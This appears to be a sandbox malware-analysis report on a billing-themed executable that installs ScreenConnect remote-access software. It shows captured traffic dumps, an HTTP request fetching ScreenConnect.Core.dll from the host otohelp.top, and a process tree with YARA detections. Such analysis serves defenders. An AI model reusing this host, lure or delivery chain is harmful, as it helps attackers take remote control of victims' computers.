2024-10-02 04:23:05 UTC	16384	IN	Data Raw: 02 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b Data Ascii: {To.{To0b{To,M{Z(o{To{T{Toto&{To{(<(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
2024-10-02 04:23:05 UTC	16384	IN	Data Raw: 73 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 Data Ascii: s'(+(+o(()~(+ `(,s-(.{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}
2024-10-02 04:23:05 UTC	16384	IN	Data Raw: 00 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63 Data Ascii: ,(o0Q(a-((b,({,((b,(o(a-(,({,(,(o(a-(,({,(,((*0(o(c
2024-10-02 04:23:05 UTC	16384	IN	Data Raw: 08 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01 Data Ascii: 2{8o6{8o0){:(t\|:(O+30){:(t\|:(O+30)Z{:s%{9X}9o(P+f}9({8o(2{8o*2{8(r
2024-10-02 04:23:05 UTC	16384	IN	Data Raw: 7b 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 Data Ascii: {=,{=o"{<,{<o",o"(`&4iA5$0J( "(,("?}s~(s}ts}q0){x(t\|x(+3*0
2024-10-02 04:23:06 UTC	16384	IN	Data Raw: 28 d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04 Data Ascii: (+~s`(!+(%-&(oA(~(oA(~oo.(o^.(oD.(oJ.(oL.(oH.(oB.(oD.(oF.(oD.(ob.(od.(of.(
2024-10-02 04:23:06 UTC	16384	IN	Data Raw: 0a 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9 Data Ascii: %(!+0EAs}s(+~%-&~s%(+0.B~r@pd(o,o""(s(,#(o(V(-ss*f(-s
2024-10-02 04:23:06 UTC	16384	IN	Data Raw: 6f fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06 Data Ascii: o((((v(#% o% o0(,+((((,((s;*(((((-d(((((-?(((((-((((

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49763	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:23:06 UTC	86	OUT	GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:23:07 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 548864 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:23:07 GMT Connection: close
2024-10-02 04:23:07 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
2024-10-02 04:23:07 UTC	16384	IN	Data Raw: 06 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72 Data Ascii: &{l"}l:(<(m0(<oF{n-(++,}n{n>oo>(o}p03=-(qo{p_,B{r,(stsu(,+&}p\|r*o{p3{r
2024-10-02 04:23:07 UTC	16384	IN	Data Raw: 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80 Data Ascii: :(}+(~+&0TBE +(s+0s+&s+s+rpszZ(<(~%-&~s%(+0%(-o(-:((
2024-10-02 04:23:07 UTC	16384	IN	Data Raw: 00 d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00 Data Ascii: o:3oXo(Y+s9%-&~o~%-&~s%(+(n(r+n((>s%}s'~%-&Ds;%(+(+(+-j+j(L(+&f__`v(
2024-10-02 04:23:07 UTC	16384	IN	Data Raw: 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
2024-10-02 04:23:07 UTC	16384	IN	Data Raw: 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28 Data Ascii: (jX}{~(+0)Q{(+tO\|(+30)Q{(-tO\|(+3V(6}}{{Z(>Z((?X(=u}u}*(c,{(
2024-10-02 04:23:07 UTC	16384	IN	Data Raw: 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 Data Ascii: o-,o290Dyo+&ooo(o(o-,o29(<}=}>}?}@}A{={>{?{@{A0G*~-:~(,~
2024-10-02 04:23:07 UTC	16384	IN	Data Raw: 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00 Data Ascii: :j*****0iY(`(2sjz(<.s2(<2{3oB(<6{o{(<6{o{.s8(<"(]"(c(<0{;(+d(zo60
2024-10-02 04:23:07 UTC	16384	IN	Data Raw: 07 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a Data Ascii: (V(<6{/o06{/o0(<J{"{#(1(<J{'{((1.s%(<o"oC.s((<oC.s(<"(R:NoC.s-(<:oC(<
2024-10-02 04:23:07 UTC	16384	IN	Data Raw: 01 f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03 Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5

Target ID:	0
Start time:	00:22:45
Start date:	02/10/2024
Path:	C:\Users\user\Desktop\E_BILL9926378035.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\E_BILL9926378035.exe"
Imagebase:	0xef0000
File size:	83'352 bytes
MD5 hash:	E0C83C9251AD547A2CC04812B2122BA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:22:45
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Imagebase:	0x1f6b3f70000
File size:	24'856 bytes
MD5 hash:	B4088F44B80D363902E11F897A7BAC09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2591740664.000001F6B5E76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:22:46
Start date:	02/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:22:46
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1928 -ip 1928
Imagebase:	0xe60000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:22:46
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 856
Imagebase:	0xe60000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:22:46
Start date:	02/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	00:23:07
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe"
Imagebase:	0xac0000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1935481684.000000001B7A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1916214053.0000000000AC2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1933881909.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:23:08
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
